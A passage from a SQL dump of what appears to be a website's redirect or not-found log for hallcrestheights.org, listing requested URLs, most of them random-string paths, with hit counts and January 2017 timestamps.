00:00:00'),(2243,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq-neei-aqjzl-i20162634-nplqfc-nebx-k56900-ilnvoxbd-jveebikp-tjvlxf-ayeaya.htm',NULL,'','',1,0,'2017-01-06 21:47:28','0000-00-00 00:00:00'),(2244,'http://www.hallcrestheights.org/i20162632-ryvhrhm-qtyysllg-k52978-eajanpdm/efnxhqf-hjdyha-oxrcj-hwuvdsve.htm',NULL,'','',1,0,'2017-01-06 21:49:15','0000-00-00 00:00:00'),(2245,'http://www.hallcrestheights.org/ajqxxucu-zaof-ifephii/k58851-jimjnjbo-gtsakbcc-gyfm-i20162630-dvju-xzlek/',NULL,'','',1,0,'2017-01-06 21:49:32','0000-00-00 00:00:00'),(2246,'http://www.hallcrestheights.org/i20162632-jglet-kymd-rqzn-rvmlkswa-k33084-zvkecqqn-eeiaqj-zlnpl-qfcneb.htm',NULL,'','',1,0,'2017-01-06 21:50:00','0000-00-00 00:00:00'),(2247,'http://www.hallcrestheights.org/ixnmu-eahw/hioz-i20162633-hjxbnwpg-k5614-eyooayik.htm',NULL,'','',1,0,'2017-01-06 21:50:34','0000-00-00 00:00:00'),(2248,'http://www.hallcrestheights.org/bsoap-azapst-asgmh-cqcm-ckfrdtf-kgpvbchs-iwhorklv-zrtjrsy-oaayfwgd-i20162635-k11757-xskmy-ukcm/',NULL,'','',1,0,'2017-01-06 21:51:45','0000-00-00 00:00:00'),(2249,'http://www.hallcrestheights.org/i20162637-ixnmue-k54676-ahwhio-zhjxbn-wpge-yooayi-kukssz-qceba-qdomytn-iholbde.htm',NULL,'','',2,0,'2017-01-06 21:52:55','0000-00-00 00:00:00'),(2250,'http://www.hallcrestheights.org/dvisc-k52984-iwbv-wkux-krbzomsm-i20162632-vuclzuph-vqawuo-xzmnp-zvsgcr-lycmc.htm',NULL,'','',1,0,'2017-01-06 21:54:03','0000-00-00 00:00:00'),(2251,'http://hallcrestheights.org/w.htm',NULL,'','',10,0,'2017-01-06 22:01:48','0000-00-00 00:00:00'),(2252,'http://www.hallcrestheights.org/pcsc-qrufunp-i20162630-kwxpo-ideotw-tvsoarm-osmgepla-lheliyr-qiyqfufx-k12332-vugo-wopegtqa-mzimczjv-hohtedh.htm',NULL,'','',1,0,'2017-01-06 22:04:29','0000-00-00 00:00:00'),(2253,'http://www.hallcrestheights.org/ajqxxuc-uzaof-ifephi-ijimjn/jbogt-i20162631-sakb-ccgyfm-k6123-dvjuxz-lektsls-hxosq-qjvfy/',NULL,'','',1,0,'2017-01-06 22:05:29','0000-00-00 00:00:00'),(2254,'http://www.hallcrestheights.org/lugd-ltrsmxx-i20162634-hypzq/jllzoh-njumnte-cwfogywb-k31662-iwyrurf-gvfcwqzh.htm',NULL,'','',1,0,'2017-01-06 22:06:32','0000-00-00 00:00:00'),(2255,'http://www.hallcrestheights.org/fadla-jfnl-i20162637-gfpc-vwgmyhde-k11284-cwxbdeud.htm',NULL,'','',4,0,'2017-01-06 22:08:08','0000-00-00 00:00:00'),(2256,'http://www.hallcrestheights.org/i20162635-k26350-jgletkym-drqzn/rvmlkswa-zvkecqq-neei.htm',NULL,'','',1,0,'2017-01-06 22:08:36','0000-00-00 00:00:00'),(2257,'http://www.hallcrestheights.org/jgletkym-drqzn/i20162636-k36230-rvmlkswa-zvkecqq-neei-aqjzl.htm',NULL,'','',1,0,'2017-01-06 22:09:31','0000-00-00 00:00:00'),(2258,'http://www.hallcrestheights.org/kzpffms-k55873-xklrd-i20162630-edhwge-fvbbgz-agpec-iyyu-wuvfzt-jigjin-amzbcng/',NULL,'','',1,0,'2017-01-06 22:10:31','0000-00-00 00:00:00'),(2259,'http://www.hallcrestheights.org/wbwpb-onkydh-k33757-xjjik-vfvt-i20162634-zpxbxkc/',NULL,'','',1,0,'2017-01-06 22:11:25','0000-00-00 00:00:00'),(2260,'http://www.hallcrestheights.org/lugd-ltrsmxx/i20162634-k10862-hypzq-jllzoh.htm',NULL,'','',1,0,'2017-01-06 22:11:29','0000-00-00 00:00:00'),(2261,'http://www.hallcrestheights.org/lugdl-trsm-xxhy-pzqjllzo/hnjumnte-cwfogy-wbiwy-i20162633-k7014-rurfgv-fcwqz-hribnkn-yfeebsb.htm',NULL,'','',1,0,'2017-01-06 22:12:31','0000-00-00 00:00:00'),(2262,'http://www.hallcrestheights.org/edzv-dlqcomn/i20162630-k12482-nmmca-wvbfuj.htm',NULL,'','',1,0,'2017-01-06 22:14:31','0000-00-00 00:00:00'),(2263,'http://www.hallcrestheights.org/dvisci-wbvwku/k33926-xkrbzo-i20162637-msmv-uclzup-hvqawu.htm',NULL,'','',1,0,'2017-01-06 22:15:31','0000-00-00 00:00:00'),(2264,'http://www.hallcrestheights.org/pcscqruf-unpkw-xpoideot/wtvsoar-mosm-i20162637-gepla-k49590-lheliy-rqiy.htm',NULL,'','',1,0,'2017-01-06 22:16:32','0000-00-00 00:00:00'),(2265,'http://www.hallcrestheights.org/ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-i20162633-fhjdyh-aoxrc-jhwuvd-k6464-svezy-twlcycw-scpuakq-njtn.htm',NULL,'','',1,0,'2017-01-06 22:17:30','0000-00-00 00:00:00'),(2266,'http://www.hallcrestheights.org/fadl-ajfnlgf-k12532-pcvwg-myhdec-wxbdeud-i20162630-kovfiibp-tquhzxc.htm',NULL,'','',1,0,'2017-01-06 22:18:32','0000-00-00 00:00:00'),(2267,'http://www.hallcrestheights.org/upttm-nbea-i20162632-tgrb-nqcdcncx-k31984-rdhcpgzz.htm',NULL,'','',3,0,'2017-01-06 22:19:31','0000-00-00 00:00:00'),(2268,'http://www.hallcrestheights.org/i20162635-bsoap-azapst-k13057-asgmh-cqcm-ckfrdtf/',NULL,'','',1,0,'2017-01-06 22:22:02','0000-00-00 00:00:00'),(2269,'http://hallcrestheights.org//i.php',NULL,'','',1,0,'2017-01-06 22:25:25','0000-00-00 00:00:00'),(2270,'http://www.hallcrestheights.org/k58688-mrcqgbe-ifuwgrab-i20162630-tnwyrqse-mgwkowh.htm',NULL,'','',1,0,'2017-01-06 22:25:33','0000-00-00 00:00:00'),(2271,'http://www.hallcrestheights.org/i20162630-pcsc-qrufunp-k22732-kwxpo-ideotw-tvsoarm.htm',NULL,'','',1,0,'2017-01-06 22:29:07','0000-00-00 00:00:00'),(2272,'http://www.hallcrestheights.org/jgle-i20162633-tkymdrq-znrvm-lkswaz-k54612-vkecqqn-eeiaqjzl-nplqfcn-ebxilnvo.htm',NULL,'','',1,0,'2017-01-06 22:36:35','0000-00-00 00:00:00'),(2273,'http://www.hallcrestheights.org/ajqxxu-cuzaofif-ephi-ijimj-i20162629-njbo-gtsakbc-k36049-cgyfmdv/',NULL,'','',1,0,'2017-01-06 22:37:34','0000-00-00 00:00:00'),(2274,'http://www.hallcrestheights.org/ryvh-k31762-rhmqtyy-sllge-ajanpd/mefnxhq-fhjdyhao-i20162634-xrcjhwu-vdsvezyt-wlcy.htm',NULL,'','',1,0,'2017-01-06 22:38:34','0000-00-00 00:00:00'),(2275,'http://www.hallcrestheights.org/fadla-jfnl-gfpc-i20162633-vwgmyhde-k6864-cwxbdeud-kovfii-bptqu-hzxchh-rmxag-fpapuhg.htm',NULL,'','',1,0,'2017-01-06 22:39:35','0000-00-00 00:00:00'),(2276,'http://www.hallcrestheights.org/wbwpbo-nkydhxjj-ikvf-vtzpx-bxkc-i20162629-k25749-wjybtyl-wosduie-qgwso/',NULL,'','',1,0,'2017-01-06 22:40:35','0000-00-00 00:00:00'),(2277,'http://www.hallcrestheights.org/qlbowc-i20162629-iggeceay-afxr-glnik-ghhm-k25949-bbxpges-mrcaizt-biauw-dtvixp-mtzh-zzwzrqrd-cfpsmfwa/',NULL,'','',1,0,'2017-01-06 22:41:35','0000-00-00 00:00:00'),(2278,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-k48414-mcawvbfu/japyvrlf-lxhqjk-i20162632-uhkcm-umbhmg-znkoh-eyrupxp-udzikmu.htm',NULL,'','',1,0,'2017-01-06 22:42:35','0000-00-00 00:00:00'),(2279,'http://www.hallcrestheights.org/upttm-nbea-i20162632-tgrb-nqcdcncx-k48364-rdhcpgzz.htm',NULL,'','',1,0,'2017-01-06 22:50:19','0000-00-00 00:00:00'),(2280,'http://www.hallcrestheights.org/ryvhr-i20162636-hmqt-yysl-lgeajanp-k42604-dmefnxhq.htm',NULL,'','',1,0,'2017-01-06 22:53:52','0000-00-00 00:00:00'),(2281,'http://www.hallcrestheights.org/bsoapaz-i20162631-apsta-sgmhcq-k6973-cmckfr-dtfkg/',NULL,'','',1,0,'2017-01-06 23:00:55','0000-00-00 00:00:00'),(2282,'http://www.hallcrestheights.org/joifa/formmail/himeji_seminar.html',NULL,'','',7,0,'2017-01-06 23:05:39','0000-00-00 00:00:00'),(2283,'http://www.hallcrestheights.org/company/topics/other/2016/csr_report_2016.php',NULL,'','',6,0,'2017-01-06 23:06:39','0000-00-00 00:00:00'),(2284,'http://www.hallcrestheights.org/oiyizgo-i20162631-lrcmw-fbsnop-k7873-dgfnhs-krljr/',NULL,'','',1,0,'2017-01-06 23:07:59','0000-00-00 00:00:00'),(2285,'http://www.hallcrestheights.org/k10628-lugdltr-i20162633-smxxhypz-qjllzohn-jumntec.htm',NULL,'','',3,0,'2017-01-06 23:15:01','0000-00-00 00:00:00'),(2286,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo-i20162633-qxifgxuh-k26764-xptvuhmi.htm',NULL,'','',1,0,'2017-01-06 23:18:32','0000-00-00 00:00:00'),(2287,'http://www.hallcrestheights.org/vqjnyspv-k16030-holjp-eurrtpil-uourxiv/lbtr-hnnmt-qzkowt-sxpp-i20162636-bgrrcdsi.htm',NULL,'','',1,0,'2017-01-06 23:23:43','0000-00-00 00:00:00'),(2288,'http://www.hallcrestheights.org/ryvh-rhmqtyy-k26692-sllge-i20162628-ajanpd-mefnxhq.htm',NULL,'','',3,0,'2017-01-06 23:25:37','0000-00-00 00:00:00'),(2289,'http://www.hallcrestheights.org/lugd-ltrsmxx-k47392-hypzq-i20162628-jllzoh-njumnte.htm',NULL,'','',3,0,'2017-01-06 23:29:09','0000-00-00 00:00:00'),(2290,'http://www.hallcrestheights.org/gnfznxvj-xpalt/k37250-itjshkyj-i20162635-yldpija.htm',NULL,'','',4,0,'2017-01-06 23:42:46','0000-00-00 00:00:00'),(2291,'http://www.hallcrestheights.org/k37988-edzvdlq-comnnmmc-i20162630-awvbfuja-pyvrlfl.htm',NULL,'','',1,0,'2017-01-06 23:43:16','0000-00-00 00:00:00'),(2292,'http://www.hallcrestheights.org/joifa/formmail/kitakyu_seminar.html',NULL,'','',7,0,'2017-01-06 23:45:45','0000-00-00 00:00:00'),(2293,'http://www.hallcrestheights.org/fadl-ajfnlgf-i20162630-k33332-pcvwg-myhdec-wxbdeud-kovfiibp.htm',NULL,'','',1,0,'2017-01-06 23:46:45','0000-00-00 00:00:00'),(2294,'http://www.hallcrestheights.org/k34023-xhajvql-wczbi-qsosqx-oqkgqa/i20162630-qydcp-tznz-vtjqoe-vpcaqw-jaluwty-bckbs-xbnbg/',NULL,'','',1,0,'2017-01-06 23:47:46','0000-00-00 00:00:00'),(2295,'http://www.hallcrestheights.org/ixnmueah-k15130-whioz-hjxbnwpg-eyooayi/kuks-szqce-baqdom-ytni-i20162636-holbdent.htm',NULL,'','',1,0,'2017-01-06 23:48:47','0000-00-00 00:00:00'),(2296,'http://www.hallcrestheights.org/pcscqru-funpkwxp-oideotwt-vsoarmo-smgepl-i20162633-alhel-iyrqiyqf-ufxv-k10928-ugowop-egtq-amzi-mczjv.htm',NULL,'','',1,0,'2017-01-06 23:49:48','0000-00-00 00:00:00'),(2297,'http://www.hallcrestheights.org/k25208-vqjnysp-vholjpeu-i20162634-rrtpiluo-urxivlb.htm',NULL,'','',3,0,'2017-01-06 23:50:20','0000-00-00 00:00:00'),(2298,'http://www.hallcrestheights.org/edzvdlqc-omnnm-mcawvbfu-japyvrl-k36480-flxh-qjkuh-kcmumb-hmgz-nkoheyru-pxpudzik-i20162636-musshe.htm',NULL,'','',1,0,'2017-01-06 23:50:46','0000-00-00 00:00:00'),(2299,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-i20162633-k16914-owtsxp-pbgrr-cdsikib-kxnpfov.htm',NULL,'','',1,0,'2017-01-06 23:52:46','0000-00-00 00:00:00'),(2300,'http://www.hallcrestheights.org/soegsz-i20162629-k15499-xyifetvt-ndyu-uhvfc/yzls-xxqroxa-ehkskxy-xembu-qudtwq/',NULL,'','',1,0,'2017-01-06 23:53:51','0000-00-00 00:00:00'),(2301,'http://www.hallcrestheights.org/pcscq-rufu-i20162632-npkw-xpoideot-k52684-wtvsoarm.htm',NULL,'','',3,0,'2017-01-06 23:57:25','0000-00-00 00:00:00'),(2302,'http://www.hallcrestheights.org/k11528-zmkuedt-i20162633-zjivyoqx-ifgxuhxp-tvuhmiw.htm',NULL,'','',2,0,'2017-01-07 00:00:57','0000-00-00 00:00:00'),(2303,'http://www.hallcrestheights.org/ryvhr-hmqt-i20162632-yysl-lgeajanp/k32334-dmefnxhq-fhjdyh-aoxrc-jhwuvd-svezy-twlcycw.htm',NULL,'','',1,0,'2017-01-07 00:02:52','0000-00-00 00:00:00'),(2304,'http://www.hallcrestheights.org/soeg-szxyife-tvtndyu/uhvfc-i20162629-yzlsx-k50755-xqroxae-hksk/',NULL,'','',1,0,'2017-01-07 00:09:50','0000-00-00 00:00:00'),(2305,'http://www.hallcrestheights.org/htxw-i20162629-k29105-hykrsvs-vhudykb-qxdos/',NULL,'','',1,0,'2017-01-07 00:10:50','0000-00-00 00:00:00'),(2306,'http://www.hallcrestheights.org/bsoa-pazapst-asgmhcq-cmckf/rdtfk-k50055-gpvbchs-iwho-rklvzrtj-rsyoa-i20162629-ayfwgd/',NULL,'','',1,0,'2017-01-07 00:11:53','0000-00-00 00:00:00'),(2307,'http://www.hallcrestheights.org/k50155-qlbo-wciggec/eayafxr-glnik-i20162629-ghhmb/',NULL,'','',1,0,'2017-01-07 00:12:50','0000-00-00 00:00:00'),(2308,'http://www.hallcrestheights.org/nfrk-opdobbu-mgolzes/k50355-rkwtz-qtqbs-i20162629-vjcwjbx-nmyv-sssldjzn/',NULL,'','',1,0,'2017-01-07 00:13:52','0000-00-00 00:00:00'),(2309,'http://www.hallcrestheights.org/htxw-i20162629-k29755-hykrsvs-vhudykb-qxdos/fiety-uaixnrb-dggs-aarhefsk-jydmr/',NULL,'','',1,0,'2017-01-07 00:14:50','0000-00-00 00:00:00'),(2310,'http://www.hallcrestheights.org/zmku-edtzjiv-k31912-yoqxi-fgxuhx-i20162634-ptvuhmi.htm',NULL,'','',1,0,'2017-01-07 00:15:04','0000-00-00 00:00:00'),(2311,'http://www.hallcrestheights.org/htxw-k49905-hykrsvs-vhudykb-qxdos-fiety-i20162629-uaixnrb-dggs-aarhefsk/',NULL,'','',1,0,'2017-01-07 00:15:51','0000-00-00 00:00:00'),(2312,'http://www.hallcrestheights.org/soeg-i20162629-k29305-szxyife-tvtndyu-uhvfc-yzlsx-xqroxae-hksk-xyxembuq-udtwq/',NULL,'','',1,0,'2017-01-07 00:16:52','0000-00-00 00:00:00'),(2313,'http://www.hallcrestheights.org/soeg-i20162629-szxyife-tvtndyu-uhvfc-yzlsx-k50105-xqroxae-hksk-xyxembuq-udtwq-ceyvuc-iwqws-gfrvrjo/',NULL,'','',1,0,'2017-01-07 00:17:52','0000-00-00 00:00:00'),(2314,'http://www.hallcrestheights.org/xhajvql-i20162631-wczbi-qsosqx-k6073-oqkgqa-qydcp/',NULL,'','',1,0,'2017-01-07 00:18:36','0000-00-00 00:00:00'),(2315,'http://www.hallcrestheights.org/googlee24a12635a2f981d.html',NULL,'','',1,0,'2017-01-07 00:18:41','0000-00-00 00:00:00'),(2316,'http://www.hallcrestheights.org/cwhr-i20162629-iwgpekz-qdwkvum-zbsai/imjzf-ozgdvdd-qjvd-obknlykc-onedw-jmaxev-ortbz-k29855-qsaxidi/',NULL,'','',1,0,'2017-01-07 00:18:50','0000-00-00 00:00:00'),(2317,'http://www.hallcrestheights.org/google5e49c29e8a0d0558.html',NULL,'','',1,0,'2017-01-07 00:20:24','0000-00-00 00:00:00'),(2318,'http://www.hallcrestheights.org/gnfznxvj-i20162635-xpalt-k15800-itjshkyj-yldpija-amdu-rtaen.htm',NULL,'','',5,0,'2017-01-07 00:21:51','0000-00-00 00:00:00'),(2319,'http://www.hallcrestheights.org/pcscq-i20162636-rufu-npkw-xpoideot-k52684-wtvsoarm.htm',NULL,'','',3,0,'2017-01-07 00:22:08','0000-00-00 00:00:00'),(2320,'http://www.hallcrestheights.org/kzpf-i20162629-fmsxklr-dedhwge-fvbbg-zagpe-k29405-ciyyuwu-vfzt-jigjinam-zbcng-tfmlyr-ghdfi-pwgdqrk/',NULL,'','',1,0,'2017-01-07 00:23:55','0000-00-00 00:00:00'),(2321,'http://www.hallcrestheights.org/k29155-wbwp-bonkydh-xjjikvf/vtzpx-i20162629-bxkcw-jybtylw-osdu/',NULL,'','',1,0,'2017-01-07 00:24:53','0000-00-00 00:00:00'),(2322,'http://www.hallcrestheights.org/i20162632-k4320-upttmnbe-atgrb-nqcdcncx-rdhcpgz-zdll-imvyx-jltfeo-bkeb.htm',NULL,'','',1,0,'2017-01-07 00:25:49','0000-00-00 00:00:00'),(2323,'http://www.hallcrestheights.org/nfrko-pdobbu-mgolz/i20162635-esrk-k11407-wtzqtqb-svjcwjbx-nmyvsssl/',NULL,'','',1,0,'2017-01-07 00:25:52','0000-00-00 00:00:00'),(2324,'http://www.hallcrestheights.org/htxwhy-krsvsvhu-dykb-qxdos-i20162632-fiet-k39089-yuaixnr-bdggsaa-rhefs-kjydmr-ujwi-mjqiaaur-ihcywncq/',NULL,'','',1,0,'2017-01-07 00:26:56','0000-00-00 00:00:00'),(2325,'http://www.hallcrestheights.org/i20162634-mrcqgbei-fuwgr-k47300-abtnwyrq-semgwko-whme-mxgku.htm',NULL,'','',1,0,'2017-01-07 00:27:52','0000-00-00 00:00:00'),(2326,'http://www.hallcrestheights.org/i20162632-k53784-ryvhr-hmqt-yysl-lgeajanp-dmefnxhq-fhjdyh-aoxrc-jhwuvd.htm',NULL,'','',1,0,'2017-01-07 00:29:13','0000-00-00 00:00:00'),(2327,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-yldpija-i20162628-k7740-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-07 00:39:48','0000-00-00 00:00:00'),(2328,'http://www.hallcrestheights.org/oiyi-zgolrcm-wfbsnop-k50305-dgfnh-i20162629-skrlj-rgfctfz-fiwx/',NULL,'','',1,0,'2017-01-07 00:42:56','0000-00-00 00:00:00'),(2329,'http://www.hallcrestheights.org/xhaj-i20162629-k50455-vqlwczb-iqsosqx-oqkgq/aqydc-ptznzvt-jqoe-vpcaqwja-luwty/',NULL,'','',1,0,'2017-01-07 00:43:55','0000-00-00 00:00:00'),(2330,'http://www.hallcrestheights.org/yemb-i20162629-jvhtqqd/ckzfltz-k50255-terqb/',NULL,'','',1,0,'2017-01-07 00:44:55','0000-00-00 00:00:00'),(2331,'http://www.hallcrestheights.org/k15630-upttmnbe-atgrb-nqcdcncx-rdhcpgz/zdll-imvyx-i20162636-jltfeo-bkeb-wivsmqkr-fbmlkmst.htm',NULL,'','',1,0,'2017-01-07 00:46:46','0000-00-00 00:00:00'),(2332,'http://www.hallcrestheights.org/i20162630-ajqxxuc-uzaof-ifephi-k36673-ijimjn-jbogt/',NULL,'','',1,0,'2017-01-07 00:47:09','0000-00-00 00:00:00'),(2333,'http://www.hallcrestheights.org/k41062-pcsc-qrufunp-i20162634-kwxpo/ideotw-tvsoarm-osmgepla-lheliyr.htm',NULL,'','',1,0,'2017-01-07 00:47:13','0000-00-00 00:00:00'),(2334,'http://www.hallcrestheights.org/upttm-k5464-nbea-tgrb-nqcdcncx-rdhcpgzz-i20162633-dllimv-yxjlt-feobke-bwivs.htm',NULL,'','',1,0,'2017-01-07 00:47:56','0000-00-00 00:00:00'),(2335,'http://www.hallcrestheights.org/jglet-i20162633-k27364-kymd-rqzn-rvmlkswa-zvkecqqn-eeiaqj-zlnpl.htm',NULL,'','',1,0,'2017-01-07 00:48:56','0000-00-00 00:00:00'),(2336,'http://www.hallcrestheights.org/yembjvh-tqqdc/i20162630-kzfltz-terqbw-nswns-k35123-njpl/',NULL,'','',1,0,'2017-01-07 00:49:57','0000-00-00 00:00:00'),(2337,'http://www.hallcrestheights.org/cwhri-wgpekz-qdwkv-i20162635-umzb-saiimjz-k12357-fozgdvdd-qjvdobkn-lykcone/',NULL,'','',1,0,'2017-01-07 00:50:59','0000-00-00 00:00:00'),(2338,'http://www.hallcrestheights.org/i20162632-vqjnyspv-holjp-eurrtpil-uourxiv-k26820-lbtr-hnnmt-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-07 00:53:58','0000-00-00 00:00:00'),(2339,'http://www.hallcrestheights.org/i20162630-bsoapaz-apsta-sgmhcq-k46753-cmckfr-dtfkg/',NULL,'','',1,0,'2017-01-07 01:01:00','0000-00-00 00:00:00'),(2340,'http://www.hallcrestheights.org/i20162630-tkuykfj-dnjjb-ucyupa-k57373-jaylrl-wfvdy/',NULL,'','',1,0,'2017-01-07 01:04:33','0000-00-00 00:00:00'),(2341,'http://www.hallcrestheights.org/vqjnyspv-holjp-eurrtpil-uourxiv-i20162636-k36180-lbtr-hnnmt-qzkowt-sxpp.htm',NULL,'','',1,0,'2017-01-07 01:25:46','0000-00-00 00:00:00'),(2342,'http://hallcrestheights.org/xmlrpc.php?rsd',NULL,'','',1,0,'2017-01-07 01:27:33','0000-00-00 00:00:00'),(2343,'http://www.hallcrestheights.org/joifa/formmail/tokushima_seminar.html',NULL,'','',4,0,'2017-01-07 01:30:04','0000-00-00 00:00:00'),(2344,'http://www.hallcrestheights.org/joifa/formmail/yonago_seminar.html',NULL,'','',5,0,'2017-01-07 01:31:03','0000-00-00 00:00:00'),(2345,'http://www.hallcrestheights.org/i20162632-edzvdlqc-omnnm-mcawvbfu-japyvrl-k46620-flxh-qjkuh-kcmumb-hmgz.htm',NULL,'','',1,0,'2017-01-07 01:32:49','0000-00-00 00:00:00'),(2346,'http://www.hallcrestheights.org/joifa/formmail/kushiro_seminar.html',NULL,'','',3,0,'2017-01-07 01:33:03','0000-00-00 00:00:00'),(2347,'http://www.hallcrestheights.org/i20162630-cwhriwg-pekzq-dwkvum-k34873-zbsaii-mjzfo/',NULL,'','',1,0,'2017-01-07 01:36:21','0000-00-00 00:00:00'),(2348,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-semgwko-k50940-whme-i20162637-mxgku-cybnpz-kicv.htm',NULL,'','',1,0,'2017-01-07 01:43:25','0000-00-00 00:00:00'),(2349,'http://www.hallcrestheights.org/jgletkym-drqzn-rvmlkswa-zvkecqq-i20162628-k29340-neei-aqjzl-nplqfc-nebx.htm',NULL,'','',1,0,'2017-01-07 01:50:28','0000-00-00 00:00:00'),(2350,'http://www.hallcrestheights.org/qlbowci-i20162631-ggece-ayafxr-k61153-glnikg-hhmbb/',NULL,'','',1,0,'2017-01-07 01:54:16','0000-00-00 00:00:00'),(2351,'http://www.hallcrestheights.org/comj/index.html',NULL,'','',7,0,'2017-01-07 01:54:19','0000-00-00 00:00:00'),(2352,'http://www.hallcrestheights.org/member1/index.html',NULL,'','',7,0,'2017-01-07 01:55:06','0000-00-00 00:00:00'),(2353,'http://www.hallcrestheights.org/about/membership.html',NULL,'','',10,0,'2017-01-07 01:57:08','0000-00-00 00:00:00'),(2354,'http://www.hallcrestheights.org/k57600-zmkuedtz-jivyo-i20162634-qxifgxuh-xptvuhm-iwnz-korpv-ubfgnq-tpmh.htm',NULL,'','',5,0,'2017-01-07 01:59:08','0000-00-00 00:00:00'),(2355,'http://www.hallcrestheights.org/k36600-gnfznxvj-xpalt-itjshkyj-yldpija-amdu-i20162635-rtaen-pggwtd-vlxt-dqkunfgl-qrhzyonx.htm',NULL,'','',5,0,'2017-01-07 02:00:07','0000-00-00 00:00:00'),(2356,'http://www.hallcrestheights.org/k40320-lugdltrs-mxxhy-pzqjllzo-hnjumnt-ecwf-ogywb-iwyrur-i20162631-fgvf.htm',NULL,'','',1,0,'2017-01-07 02:01:05','0000-00-00 00:00:00'),(2357,'http://www.hallcrestheights.org/k37800-dvisciwb-vwkux-krbzomsm-i20162635-vuclzup-hvqa-wuoxz-mnpzvs-gcrl.htm',NULL,'','',1,0,'2017-01-07 02:04:36','0000-00-00 00:00:00'),(2358,'http://www.hallcrestheights.org/mrcqg-beif-i20162637-uwgr-abtnwyrq-k1384-semgwkow.htm',NULL,'','',1,0,'2017-01-07 02:06:11','0000-00-00 00:00:00'),(2359,'http://www.hallcrestheights.org/vqjny-spvh-oljp-eurrtpil/uourxivl-btrhnn-mtqzk-k42654-owtsxp-pbgrr-cdsikib-i20162636-kxnpfov.htm',NULL,'','',1,0,'2017-01-07 02:07:09','0000-00-00 00:00:00'),(2360,'http://www.hallcrestheights.org/fadla-k22204-jfnl-gfpc-vwgmyhde-cwxbdeud-kovfii-bptqu-hzxchh-i20162636-rmxag.htm',NULL,'','',1,0,'2017-01-07 02:09:10','0000-00-00 00:00:00'),(2361,'http://www.hallcrestheights.org/joifa/formmail/officekanrishi.html',NULL,'','',4,0,'2017-01-07 02:10:09','0000-00-00 00:00:00'),(2362,'http://www.hallcrestheights.org/course/symposium/index.html',NULL,'','',1,0,'2017-01-07 02:11:11','0000-00-00 00:00:00'),(2363,'http://www.hallcrestheights.org/pdf/earthquake_2014.pdf',NULL,'','',5,0,'2017-01-07 02:12:10','0000-00-00 00:00:00'),(2364,'http://www.hallcrestheights.org/zmkue-dtzj-ivyo/qxifgxuh-i20162636-xptvuhmi-k42754-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-07 02:14:10','0000-00-00 00:00:00'),(2365,'http://www.hallcrestheights.org/mrcqgbei-fuwgr-abtnwyrq-i20162635-semgwko-k36900-whme-mxgku-cybnpz-kicv.htm',NULL,'','',3,0,'2017-01-07 02:15:12','0000-00-00 00:00:00'),(2366,'http://www.hallcrestheights.org/comj/shikaku_iji_2015.html',NULL,'','',4,0,'2017-01-07 02:16:11','0000-00-00 00:00:00'),(2367,'http://www.hallcrestheights.org/company/topics/award/2016/mini_monos_KDA.php',NULL,'','',4,0,'2017-01-07 02:17:10','0000-00-00 00:00:00'),(2368,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_sapporo.html',NULL,'','',3,0,'2017-01-07 02:18:11','0000-00-00 00:00:00'),(2369,'http://www.hallcrestheights.org/gnfznxvj-xpalt-itjshkyj-i20162635-yldpija-k17100-amdu-rtaen-pggwtd-vlxt.htm',NULL,'','',1,0,'2017-01-07 02:18:44','0000-00-00 00:00:00'),(2370,'http://www.hallcrestheights.org/nfrkopdo-i20162633-bbum-golzesr/kwtzqtqb-svjcwjbx-nmyv-sssl-k39591-djzna/',NULL,'','',1,0,'2017-01-07 02:19:11','0000-00-00 00:00:00'),(2371,'http://www.hallcrestheights.org/joifa/formmail/office_seminar_2016_nagoya.html',NULL,'','',3,0,'2017-01-07 02:20:12','0000-00-00 00:00:00'),(2372,'http://www.hallcrestheights.org/edzvd-lqco-mnnm-mcawvbfu/k834-japyvrlf-lxhqjk-uhkcm-i20162637-umbhmg-znkoh-eyrupxp.htm',NULL,'','',1,0,'2017-01-07 02:21:12','0000-00-00 00:00:00'),(2373,'http://www.hallcrestheights.org/i20162630-htxwhyk-rsvsv-hudykb-k55573-qxdosf-ietyu/',NULL,'','',1,0,'2017-01-07 02:22:16','0000-00-00 00:00:00'),(2374,'http://www.hallcrestheights.org/ryvhrhm-qtyysllg-i20162634-eajanpdm-k5008-efnxhqf-hjdyha-oxrcj-hwuvdsve.htm',NULL,'','',1,0,'2017-01-07 02:29:21','0000-00-00 00:00:00'),(2375,'http://www.hallcrestheights.org/pcscq-rufu-npkw-xpoideot-wtvsoarm-osmgep-lalhe-liyrqi-i20162636-k42284-yqfuf-xvugowo-pegtqam-zimc.htm',NULL,'','',1,0,'2017-01-07 02:32:14','0000-00-00 00:00:00'),(2376,'http://www.hallcrestheights.org/i20162632-pcscqruf-unpkw-xpoideot-wtvsoar-k25020-mosm-gepla-lheliy-rqiy.htm',NULL,'','',1,0,'2017-01-07 02:36:24','0000-00-00 00:00:00'),(2377,'http://www.hallcrestheights.org/ajqxxucu-k39741-zaof-ifephii-i20162633-jimjnjbo-gtsakbcc-gyfm-dvju-xzlek-tsls-hxosqqj/',NULL,'','',1,0,'2017-01-07 02:43:16','0000-00-00 00:00:00'),(2378,'http://www.hallcrestheights.org/k28440-dvisciwb-vwkux-krbzomsm-vuclzup-i20162628-hvqa-wuoxz-mnpzvs-gcrl.htm',NULL,'','',1,0,'2017-01-07 02:43:29','0000-00-00 00:00:00'),(2379,'http://www.hallcrestheights.org/i20162632-zmkue-dtzj-ivyo-qxifgxuh-k57964-xptvuhmi-wnzkor-pvubf.htm',NULL,'','',1,0,'2017-01-07 02:44:15','0000-00-00 00:00:00'),(2380,'http://www.hallcrestheights.org/ixnmu-eahw-hioz-hjxbnwpg/k22254-eyooayik-uksszq-i20162636-cebaq-domytn-iholb-dentafy.htm',NULL,'','',1,0,'2017-01-07 02:45:16','0000-00-00 00:00:00'),(2381,'http://www.hallcrestheights.org/about/creative_office.html',NULL,'','',6,0,'2017-01-07 02:46:15','0000-00-00 